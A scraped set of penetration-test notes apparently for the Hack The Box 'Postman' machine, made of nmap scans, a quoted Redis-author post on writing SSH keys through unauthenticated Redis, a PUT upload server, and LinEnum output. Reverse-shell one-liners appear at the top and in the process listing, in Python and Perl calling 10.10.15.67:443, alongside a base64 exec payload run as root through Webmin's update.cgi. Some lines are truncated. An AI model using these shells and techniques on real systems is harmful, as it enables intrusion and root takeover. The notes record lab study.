Documente Academic
Documente Profesional
Documente Cultură
import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SO
80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])
1/59
nmap
Nmap scan report for 10.10.10.160
Host is up (0.54s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
(Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77
(RSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45
(ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html;
Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
2/59
dirbuster
3/59
nmap1
Nmap scan report for 10.10.10.160
Host is up (0.50s latency).
Not shown: 65525 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
(Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77
(RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89
(ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45
(ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html;
Charset=iso-8859-1).
13532/tcp filtered unknown
20784/tcp filtered unknown
28883/tcp filtered unknown
29134/tcp filtered unknown
37469/tcp filtered unknown
49977/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
4/59
redis vuln.
From time to time I get security reports about Redis. It’s
good to get reports, but it’s odd that what I get is usually
about things like Lua sandbox escaping, insecure temporary
file creation, and similar issues, in a software which is
designed (as we explain in our security page here http://
redis.io/topics/security) to be totally insecure if exposed to
the outside world.
Yet these bug reports are often useful since there are
different levels of security concerning any software in
general and Redis specifically. What you can do if you have
access to the database, just modify the content of the
database itself or compromise the local system where Redis
is running?
Let’s crack Redis for fun and no profit at all given I’m the
developer of this thing
===
6/59
Works, and no AUTH required. Redis is unprotected without a
password set up, and so forth. The simplest thing you can do
in such a case, is to write random files. Guess what? my
Macbook Air happens to run an SSH server. What about
trying to write something into ~/ssh/authorized_keys in
order to gain access?
Now foo.txt is just our public key but with newlines. We can
write this string inside the memory of Redis using redis-cli:
$ redis-cli -h 192.168.1.11
192.168.1.11:6379> config set dir /Users/antirez/.ssh/
OK
192.168.1.11:6379> config get dir
1) "dir"
2) "/Users/antirez/.ssh"
192.168.1.11:6379> config set dbfilename "authorized_keys"
OK
192.168.1.11:6379> save
OK
This proposal basically adds users with ACLs. It’s very similar
to AUTH in the way it works and in the speed of execution,
but different users have different capabilities. For example
normal users are not able to access administrative
commands by default, so no “CONFIG SET dir” for them, and
no issues like the exploit above.
The default user can yet run the normal commands (so the
patches people sent me about Lua sandboxing, that I
applied, are very useful indeed), and an admin user must be
configured in order to use administration commands.
However what we could do to make Redis more user friendly
is to always have an “admin” user with empty password
which is accepted if the connection comes from the loopback
interface (but it should be possible to disable this feature).
Users that don’t care about protecting their instances will stil
have a database which is accessible from the outside, but
without admin commands available, which still makes things
insecure from the point of view of the data contained inside
the database, but more secure from the point of view of the
system running the Redis instance.
Reddit: https://www.reddit.com/r/redis/comments/3rby8c/
a_few_things_about_redis_security/
13/59
redis
total 660
drwxr-x--- 7 redis redis 4096 Nov 16 06:36 .
drwxr-xr-x 37 root root 4096 Aug 25 21:24 ..
drwxr-xr-x 2 root root 4096 Oct 25 15:21 6379
-rw------- 1 redis redis 399 Oct 25 14:43 .bash_history
drwx------ 2 redis redis 4096 Aug 25 23:46 .cache
-rw-r----- 1 redis redis 46760 Aug 26 01:40 dkixshbr.so
-rw-rw---- 1 redis redis 92 Nov 16 06:36 dump.rdb
drwx------ 3 redis redis 4096 Aug 25 23:46 .gnupg
-rw-r----- 1 redis redis 46760 Aug 25 22:26 ibortfgq.so
drwxrwxr-x 3 redis redis 4096 Aug 26 02:31 .local
-rw-r----- 1 redis redis 440656 Aug 25 22:54 module.o
-rw-r----- 1 redis redis 46760 Aug 25 22:21 qcbxxlig.so
drwxr-xr-x 2 redis root 4096 Nov 16 06:48 .ssh
-rw-r----- 1 redis redis 46760 Aug 25 22:22 vlpaulhk.so
dump.rdb
REDIS0008 redis-ver4.0.9
redis-bits@ctimeused-mem8
aof-preamble+p>
contents of 6379
dump.rdb
REDIS0009 redis-ver5.0.0
redis-bits@ctimeused-memx
aof-preamble W__
content of /var/www
SimpleHTTPPutServer.py
14/59
# python -m SimpleHTTPPutServer 8080
import SimpleHTTPServer
import BaseHTTPServer
class SputHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHand
def do_PUT(self):
print self.headers
length = int(self.headers["Content-Length"])
path = self.translate_path(self.path)
with open(path, "wb") as dst:
dst.write(self.rfile.read(length))
if __name__ == '__main__':
SimpleHTTPServer.test(HandlerClass=SputHTTPRequestHandler)
15/59
LinEnum
#######################################
# Local Linux Enumeration & Privilege Escalation Script #
#######################################
# www.rebootuser.com
# version 0.98
### SYSTEM
#######################################
[-] Kernel information:
Linux Postman 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6
11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
[-] Hostname:
Postman
### USER/GROUP
#######################################
[-] Current user/group info:
uid=107(redis) gid=114(redis) groups=114(redis)
18/59
[-] It looks like we have some admin users:
uid=102(syslog) gid=106(syslog) groups=106(syslog),
4(adm)
19/59
[-] Super user account(s):
root
### ENVIRONMENTAL
#######################################
[-] Environment information:
SSH_CONNECTION=10.10.16.8 44362 10.10.10.160 22
LANG=en_US.UTF-8
XDG_SESSION_ID=4
USER=redis
PWD=/var/lib/redis
HOME=/var/lib/redis
SSH_CLIENT=10.10.16.8 44362 22
SSH_TTY=/dev/pts/0
MAIL=/var/mail/redis
SHELL=/bin/bash
TERM=xterm-256color
SHLVL=2
LOGNAME=redis
XDG_RUNTIME_DIR=/run/user/107
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/
bin:/usr/games:/usr/local/games
_=/usr/bin/env
### JOBS/TASKS
#######################################
[-] Cron jobs:
-rw-r--r-- 1 root root 722 Nov 16 2017 /etc/crontab
/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 Aug 25 18:44 .
drwxr-xr-x 81 root root 4096 Oct 25 16:44 ..
-rw-r--r-- 1 root root 712 Jan 17 2018 php
21/59
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rw-r--r-- 1 root root 191 Aug 24 11:33 popularity-contest
/etc/cron.daily:
total 56
drwxr-xr-x 2 root root 4096 Aug 25 18:24 .
drwxr-xr-x 81 root root 4096 Oct 25 16:44 ..
-rwxr-xr-x 1 root root 539 Jul 16 19:14 apache2
-rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat
-rwxr-xr-x 1 root root 77 Sep 5 2008 apt-show-versions
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1176 Nov 2 2017 dpkg
-rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate
-rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db
-rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate
-rwxr-xr-x 1 root root 249 Jan 25 2018 passwd
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest
-rwxr-xr-x 1 root root 246 Mar 21 2018 ubuntu-advantage-
tools
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Aug 24 11:27 .
drwxr-xr-x 81 root root 4096 Oct 25 16:44 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Aug 24 11:27 .
drwxr-xr-x 81 root root 4096 Oct 25 16:44 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
/etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 Aug 24 11:33 .
drwxr-xr-x 81 root root 4096 Oct 25 16:44 ..
-rwxr-xr-x 1 root root 723 Apr 7 2018 man-db
22/59
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
6 timers listed.
Enable thorough tests to see inactive timers
### NETWORKING
#######################################
[-] Network and IP info:
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>
mtu 1500
inet 10.10.10.160 netmask 255.255.255.0 broadcast
10.10.10.255
inet6 dead:beef::250:56ff:febd:5342 prefixlen 64
scopeid 0x0<global>
inet6 fe80::250:56ff:febd:5342 prefixlen 64 scopeid
0x20<link>
ether 00:50:56:bd:53:42 txqueuelen 1000 (Ethernet)
RX packets 95573 bytes 8588335 (8.5 MB)
RX errors 7 dropped 10 overruns 0 frame 0
TX packets 93836 bytes 21317325 (21.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 19 base 0x2000
[-] Nameserver(s):
nameserver 127.0.0.53
[-] Nameserver(s):
Global
DNSSEC NTA: 10.in-addr.arpa
16.172.in-addr.arpa
168.192.in-addr.arpa
17.172.in-addr.arpa
18.172.in-addr.arpa
19.172.in-addr.arpa
20.172.in-addr.arpa
21.172.in-addr.arpa
22.172.in-addr.arpa
23.172.in-addr.arpa
24.172.in-addr.arpa
25.172.in-addr.arpa
26.172.in-addr.arpa
27.172.in-addr.arpa
28.172.in-addr.arpa
29.172.in-addr.arpa
30.172.in-addr.arpa
31.172.in-addr.arpa
corp
d.f.ip6.arpa
home
internal
intranet
25/59
lan
local
private
test
Link 2 (ens33)
Current Scopes: none
LLMNR setting: yes
MulticastDNS setting: no
DNSSEC setting: no
DNSSEC supported: no
26/59
[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign
Address State PID/Program name
udp 0 0 0.0.0.0:10000
0.0.0.0:* -
udp 0 0 127.0.0.53:53
0.0.0.0:* -
### SERVICES
#######################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START
TIME COMMAND
root 1 0.1 0.7 159396 7160 ? Ss 06:33 0:02 /
sbin/init splash
root 2 0.0 0.0 0 0? S 06:33 0:00
[kthreadd]
root 4 0.0 0.0 0 0? I< 06:33 0:00
[kworker/0:0H]
root 6 0.0 0.0 0 0? I< 06:33 0:00
[mm_percpu_wq]
root 7 0.0 0.0 0 0? S 06:33 0:00
[ksoftirqd/0]
root 8 0.0 0.0 0 0? I 06:33 0:00
[rcu_sched]
root 9 0.0 0.0 0 0? I 06:33 0:00 [rcu_bh]
root 10 0.0 0.0 0 0? S 06:33 0:00
[migration/0]
root 11 0.0 0.0 0 0? S 06:33 0:00
[watchdog/0]
root 12 0.0 0.0 0 0? S 06:33 0:00 [cpuhp/
0]
root 13 0.0 0.0 0 0? S 06:33 0:00
[kdevtmpfs]
root 14 0.0 0.0 0 0? I< 06:33 0:00 [netns]
root 15 0.0 0.0 0 0? S 06:33 0:00
27/59
[rcu_tasks_kthre]
root 16 0.0 0.0 0 0? S 06:33 0:00
[kauditd]
root 17 0.0 0.0 0 0? S 06:33 0:00
[khungtaskd]
root 18 0.0 0.0 0 0? S 06:33 0:00
[oom_reaper]
root 19 0.0 0.0 0 0? I< 06:33 0:00
[writeback]
root 20 0.0 0.0 0 0? S 06:33 0:00
[kcompactd0]
root 21 0.0 0.0 0 0? SN 06:33 0:00 [ksmd]
root 22 0.0 0.0 0 0? SN 06:33 0:00
[khugepaged]
root 23 0.0 0.0 0 0? I< 06:33 0:00
[crypto]
root 24 0.0 0.0 0 0? I< 06:33 0:00
[kintegrityd]
root 25 0.0 0.0 0 0? I< 06:33 0:00
[kblockd]
root 26 0.0 0.0 0 0? I< 06:33 0:00
[ata_sff]
root 27 0.0 0.0 0 0? I< 06:33 0:00 [md]
root 28 0.0 0.0 0 0? I< 06:33 0:00 [edac-
poller]
root 29 0.0 0.0 0 0? I< 06:33 0:00
[devfreq_wq]
root 30 0.0 0.0 0 0? I< 06:33 0:00
[watchdogd]
root 32 0.0 0.0 0 0? I 06:33 0:00
[kworker/0:1]
root 34 0.0 0.0 0 0? S 06:33 0:00
[kswapd0]
root 35 0.0 0.0 0 0? I< 06:33 0:00
[kworker/u257:0]
root 36 0.0 0.0 0 0? S 06:33 0:00
[ecryptfs-kthrea]
root 78 0.0 0.0 0 0? I< 06:33 0:00
28/59
[kthrotld]
root 79 0.0 0.0 0 0? I< 06:33 0:00
[acpi_thermal_pm]
root 80 0.0 0.0 0 0? S 06:33 0:00
[scsi_eh_0]
root 81 0.0 0.0 0 0? I< 06:33 0:00
[scsi_tmf_0]
root 82 0.0 0.0 0 0? S 06:33 0:00
[scsi_eh_1]
root 83 0.0 0.0 0 0? I< 06:33 0:00
[scsi_tmf_1]
root 85 0.0 0.0 0 0? I 06:33 0:00
[kworker/0:2]
root 90 0.0 0.0 0 0? I< 06:33 0:00
[ipv6_addrconf]
root 99 0.0 0.0 0 0? I< 06:33 0:00 [kstrp]
root 116 0.0 0.0 0 0? I< 06:33 0:00
[charger_manager]
root 117 0.0 0.0 0 0? I 06:33 0:00
[kworker/u256:4]
root 169 0.0 0.0 0 0? I< 06:33 0:00
[mpt_poll_0]
root 170 0.0 0.0 0 0? I< 06:33 0:00 [mpt/
0]
root 172 0.0 0.0 0 0? I< 06:33 0:00
[kworker/0:1H]
root 173 0.0 0.0 0 0? S 06:33 0:00
[scsi_eh_2]
root 174 0.0 0.0 0 0? I< 06:33 0:00
[scsi_tmf_2]
root 195 0.0 0.0 0 0? S 06:33 0:00 [jbd2/
sda1-8]
root 196 0.0 0.0 0 0? I< 06:33 0:00 [ext4-
rsv-conver]
root 240 0.0 0.8 78460 8240 ? S<s 06:33 0:00 /
lib/systemd/systemd-journald
root 251 0.0 0.4 45196 3756 ? Ss 06:33 0:00 /
lib/systemd/systemd-udevd
29/59
systemd+ 329 0.0 0.3 70628 3320 ? Ss 06:33
0:00 /lib/systemd/systemd-resolved
systemd+ 331 0.0 0.2 141928 1848 ? Ssl 06:33
0:00 /lib/systemd/systemd-timesyncd
root 332 0.0 1.2 170344 11096 ? Ssl 06:33 0:00 /
usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-
triggers
syslog 339 0.0 0.4 263036 4024 ? Ssl 06:33 0:00 /
usr/sbin/rsyslogd -n
root 340 0.0 0.5 289844 4684 ? Ssl 06:33 0:00 /
usr/lib/accountsservice/accounts-daemon
root 344 0.0 0.2 31320 2700 ? Ss 06:33 0:00 /
usr/sbin/cron -f
root 347 0.0 0.5 70608 4876 ? Ss 06:33 0:00 /
lib/systemd/systemd-logind
message+ 350 0.0 0.4 50040 4124 ? Ss 06:33
0:00 /usr/bin/dbus-daemon --system --address=systemd: --
nofork --nopidfile --systemd-activation --syslog-only
root 435 0.0 0.0 0 0? I< 06:33 0:00
[ttm_swap]
root 437 0.0 0.0 0 0? S 06:33 0:00 [irq/16-
vmwgfx]
root 566 0.0 0.6 72296 6180 ? Ss 06:33 0:00 /
usr/sbin/sshd -D
root 578 0.0 0.1 16180 1736 tty1 Ss+ 06:33
0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
redis 585 0.0 0.4 51572 4140 ? Ssl 06:33 0:00 /
usr/bin/redis-server 0.0.0.0:6379
root 595 0.0 1.7 331332 15900 ? Ss 06:33 0:00 /
usr/sbin/apache2 -k start
www-data 597 0.0 1.1 335848 10244 ? S 06:33
0:00 /usr/sbin/apache2 -k start
www-data 598 0.0 1.1 335872 10372 ? S 06:33
0:00 /usr/sbin/apache2 -k start
www-data 599 0.0 1.1 335840 10240 ? S 06:33
0:00 /usr/sbin/apache2 -k start
www-data 602 0.0 1.1 335872 10376 ? S 06:33
0:00 /usr/sbin/apache2 -k start
30/59
root 676 0.1 3.2 95308 29640 ? Ss 06:33 0:01 /
usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/
miniserv.conf
www-data 1229 0.0 1.1 335800 10172 ? S 06:35
0:00 /usr/sbin/apache2 -k start
www-data 1258 0.0 1.1 335856 10356 ? S 06:35
0:00 /usr/sbin/apache2 -k start
www-data 1950 0.0 1.1 335856 10360 ? S 06:38
0:00 /usr/sbin/apache2 -k start
www-data 2059 0.0 1.1 335856 10352 ? S 06:38
0:00 /usr/sbin/apache2 -k start
root 2281 0.0 0.0 0 0? I 06:38 0:00
[kworker/u256:0]
www-data 2618 0.0 1.1 335800 10176 ? S 06:40
0:00 /usr/sbin/apache2 -k start
root 3022 0.0 0.0 0 0? I 06:44 0:00
[kworker/u256:1]
www-data 3307 0.0 1.1 335792 10164 ? S 06:47
0:00 /usr/sbin/apache2 -k start
root 3380 0.0 0.7 107988 7000 ? Ss 06:48 0:00
sshd: redis [priv]
redis 3385 0.0 0.8 76616 7368 ? Ss 06:48 0:00 /
lib/systemd/systemd --user
redis 3386 0.0 0.2 193380 2156 ? S 06:48 0:00
(sd-pam)
redis 3434 0.0 0.4 108096 4492 ? S 06:48 0:00
sshd: redis@pts/0
redis 3439 0.0 0.5 22484 4992 pts/0 Ss 06:48 0:00
-bash
root 3486 0.0 5.1 118884 47068 ? S 06:49 0:00 /
usr/share/webmin/package-updates/update.cgi
root 3493 0.0 0.0 4628 780 ? S 06:49 0:00 sh
-c apt-get -y install apt ;python -c "import
base64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdWJwc
</tmp/.webmin/535820_3486_2_update.cgi 2>&1
root 3503 0.0 0.9 33400 9120 ? S 06:49 0:00
python -c import
base64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdWJwc
31/59
root 3504 0.0 0.0 4628 816 ? S 06:49 0:00 /
bin/sh -i
root 3616 0.2 5.1 118892 47064 ? S 06:50 0:00 /
usr/share/webmin/package-updates/update.cgi
root 3636 0.0 3.2 95308 29884 ? S 06:50 0:00 /
usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/
miniserv.conf
root 3671 0.0 0.0 0 0? Z 06:50 0:00 [sh]
<defunct>
root 3689 0.0 0.7 28772 6628 ? S 06:50 0:00
perl -MIO -e $p=fork;exit,if($p);foreach my $key(keys %ENV)
{if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new
IO::Socket::INET(PeerAddr,"10.10.15.67:443");STDIN-
>fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/)
{system $1;}};
root 3718 0.0 3.4 97744 31592 ? S 06:51 0:00 /
usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/
miniserv.conf
redis 3737 0.0 0.4 13676 4036 pts/0 S+ 06:51
0:00 /bin/bash ./LinEnum.sh
redis 3738 0.1 0.3 13808 2980 pts/0 S+ 06:51
0:00 /bin/bash ./LinEnum.sh
redis 3739 0.0 0.0 7476 748 pts/0 S+ 06:51 0:00
tee -a
root 3742 0.0 0.7 33084 7040 ? S 06:51 0:00
python -c import pty; pty.spawn("/bin/bash")
root 3743 0.0 0.3 18640 3524 pts/1 Ss+ 06:51
0:00 /bin/bash
root 3919 0.0 3.2 95308 29948 ? S 06:51 0:00 /
usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/
miniserv.conf
redis 3937 0.0 0.3 13808 2788 pts/0 S+ 06:51
0:00 /bin/bash ./LinEnum.sh
redis 3938 0.0 0.3 39664 3668 pts/0 R+ 06:51
0:00 ps aux
/lib/systemd/system:
total 844K
-rw-r--r-- 1 root root 1.2K Oct 25 14:10 redis-server.service
drwxr-xr-x 2 root root 4.0K Aug 25 18:24 apache2.service.d
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 halt.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 initrd-switch-
root.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 kexec.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 multi-
user.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:33
poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 reboot.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 getty.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30
graphical.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 local-fs.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 timers.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 rc-local.service.d
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 user@.service.d
lrwxrwxrwx 1 root root 14 Jul 22 17:45 autovt@.service ->
36/59
getty@.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 bootlogd.service -> /
dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 bootlogs.service -> /
dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 bootmisc.service -> /
dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 checkfs.service -> /
dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 checkroot-
bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 checkroot.service -> /
dev/null
-rw-r--r-- 1 root root 1.1K Jul 22 17:45 console-getty.service
-rw-r--r-- 1 root root 1.3K Jul 22 17:45 container-
getty@.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 cryptdisks-
early.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 cryptdisks.service -> /
dev/null
lrwxrwxrwx 1 root root 13 Jul 22 17:45 ctrl-alt-del.target ->
reboot.target
lrwxrwxrwx 1 root root 25 Jul 22 17:45 dbus-
org.freedesktop.hostname1.service -> systemd-
hostnamed.service
lrwxrwxrwx 1 root root 23 Jul 22 17:45 dbus-
org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root 22 Jul 22 17:45 dbus-
org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root 25 Jul 22 17:45 dbus-
org.freedesktop.timedate1.service -> systemd-
timedated.service
-rw-r--r-- 1 root root 1.1K Jul 22 17:45 debug-shell.service
lrwxrwxrwx 1 root root 16 Jul 22 17:45 default.target ->
graphical.target
-rw-r--r-- 1 root root 797 Jul 22 17:45 emergency.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 fuse.service -> /dev/
null
37/59
-rw-r--r-- 1 root root 2.0K Jul 22 17:45 getty@.service
-rw-r--r-- 1 root root 342 Jul 22 17:45 getty-static.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 halt.service -> /dev/
null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 hostname.service -> /
dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 hwclock.service -> /
dev/null
-rw-r--r-- 1 root root 670 Jul 22 17:45 initrd-cleanup.service
-rw-r--r-- 1 root root 830 Jul 22 17:45 initrd-parse-etc.service
-rw-r--r-- 1 root root 589 Jul 22 17:45 initrd-switch-
root.service
-rw-r--r-- 1 root root 704 Jul 22 17:45 initrd-udevadm-
cleanup-db.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 killprocs.service -> /
dev/null
lrwxrwxrwx 1 root root 28 Jul 22 17:45 kmod.service ->
systemd-modules-load.service
-rw-r--r-- 1 root root 717 Jul 22 17:45 kmod-static-
nodes.service
lrwxrwxrwx 1 root root 28 Jul 22 17:45 module-init-
tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 motd.service -> /dev/
null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 mountall-
bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 mountall.service -> /
dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45
mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 mountkernfs.service -
> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 mountnfs-
bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 mountnfs.service -> /
dev/null
-rw-r--r-- 1 root root 362 Jul 22 17:45 ondemand.service
lrwxrwxrwx 1 root root 22 Jul 22 17:45 procps.service ->
38/59
systemd-sysctl.service
-rw-r--r-- 1 root root 609 Jul 22 17:45 quotaon.service
-rw-r--r-- 1 root root 716 Jul 22 17:45 rc-local.service
lrwxrwxrwx 1 root root 16 Jul 22 17:45 rc.local.service -> rc-
local.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 rc.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 rcS.service -> /dev/
null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 reboot.service -> /
dev/null
-rw-r--r-- 1 root root 788 Jul 22 17:45 rescue.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 rmnologin.service -> /
dev/null
lrwxrwxrwx 1 root root 15 Jul 22 17:45 runlevel0.target ->
poweroff.target
lrwxrwxrwx 1 root root 13 Jul 22 17:45 runlevel1.target ->
rescue.target
lrwxrwxrwx 1 root root 17 Jul 22 17:45 runlevel2.target ->
multi-user.target
lrwxrwxrwx 1 root root 17 Jul 22 17:45 runlevel3.target ->
multi-user.target
lrwxrwxrwx 1 root root 17 Jul 22 17:45 runlevel4.target ->
multi-user.target
lrwxrwxrwx 1 root root 16 Jul 22 17:45 runlevel5.target ->
graphical.target
lrwxrwxrwx 1 root root 13 Jul 22 17:45 runlevel6.target ->
reboot.target
lrwxrwxrwx 1 root root 9 Jul 22 17:45 sendsigs.service -> /
dev/null
-rw-r--r-- 1 root root 1.5K Jul 22 17:45 serial-getty@.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 single.service -> /
dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 stop-bootlogd.service
-> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 stop-bootlogd-
single.service -> /dev/null
-rw-r--r-- 1 root root 554 Jul 22 17:45 suspend-then-
hibernate.target
39/59
-rw-r--r-- 1 root root 724 Jul 22 17:45 systemd-ask-password-
console.service
-rw-r--r-- 1 root root 752 Jul 22 17:45 systemd-ask-password-
wall.service
-rw-r--r-- 1 root root 752 Jul 22 17:45 systemd-
backlight@.service
-rw-r--r-- 1 root root 999 Jul 22 17:45 systemd-binfmt.service
-rw-r--r-- 1 root root 537 Jul 22 17:45 systemd-exit.service
-rw-r--r-- 1 root root 551 Jul 22 17:45 systemd-fsckd.service
-rw-r--r-- 1 root root 540 Jul 22 17:45 systemd-fsckd.socket
-rw-r--r-- 1 root root 714 Jul 22 17:45 systemd-fsck-
root.service
-rw-r--r-- 1 root root 715 Jul 22 17:45 systemd-fsck@.service
-rw-r--r-- 1 root root 584 Jul 22 17:45 systemd-halt.service
-rw-r--r-- 1 root root 671 Jul 22 17:45 systemd-hibernate-
resume@.service
-rw-r--r-- 1 root root 541 Jul 22 17:45 systemd-
hibernate.service
-rw-r--r-- 1 root root 1.1K Jul 22 17:45 systemd-
hostnamed.service
-rw-r--r-- 1 root root 818 Jul 22 17:45 systemd-hwdb-
update.service
-rw-r--r-- 1 root root 559 Jul 22 17:45 systemd-hybrid-
sleep.service
-rw-r--r-- 1 root root 551 Jul 22 17:45 systemd-initctl.service
-rw-r--r-- 1 root root 686 Jul 22 17:45 systemd-journald-
audit.socket
-rw-r--r-- 1 root root 1.6K Jul 22 17:45 systemd-
journald.service
-rw-r--r-- 1 root root 771 Jul 22 17:45 systemd-journal-
flush.service
-rw-r--r-- 1 root root 597 Jul 22 17:45 systemd-kexec.service
-rw-r--r-- 1 root root 1.1K Jul 22 17:45 systemd-localed.service
-rw-r--r-- 1 root root 1.5K Jul 22 17:45 systemd-logind.service
-rw-r--r-- 1 root root 733 Jul 22 17:45 systemd-machine-id-
commit.service
-rw-r--r-- 1 root root 1007 Jul 22 17:45 systemd-modules-
load.service
40/59
-rw-r--r-- 1 root root 1.9K Jul 22 17:45 systemd-
networkd.service
-rw-r--r-- 1 root root 740 Jul 22 17:45 systemd-networkd-wait-
online.service
-rw-r--r-- 1 root root 593 Jul 22 17:45 systemd-
poweroff.service
-rw-r--r-- 1 root root 655 Jul 22 17:45 systemd-
quotacheck.service
-rw-r--r-- 1 root root 792 Jul 22 17:45 systemd-random-
seed.service
-rw-r--r-- 1 root root 588 Jul 22 17:45 systemd-reboot.service
-rw-r--r-- 1 root root 833 Jul 22 17:45 systemd-remount-
fs.service
-rw-r--r-- 1 root root 1.7K Jul 22 17:45 systemd-
resolved.service
-rw-r--r-- 1 root root 724 Jul 22 17:45 systemd-rfkill.service
-rw-r--r-- 1 root root 537 Jul 22 17:45 systemd-
suspend.service
-rw-r--r-- 1 root root 573 Jul 22 17:45 systemd-suspend-then-
hibernate.service
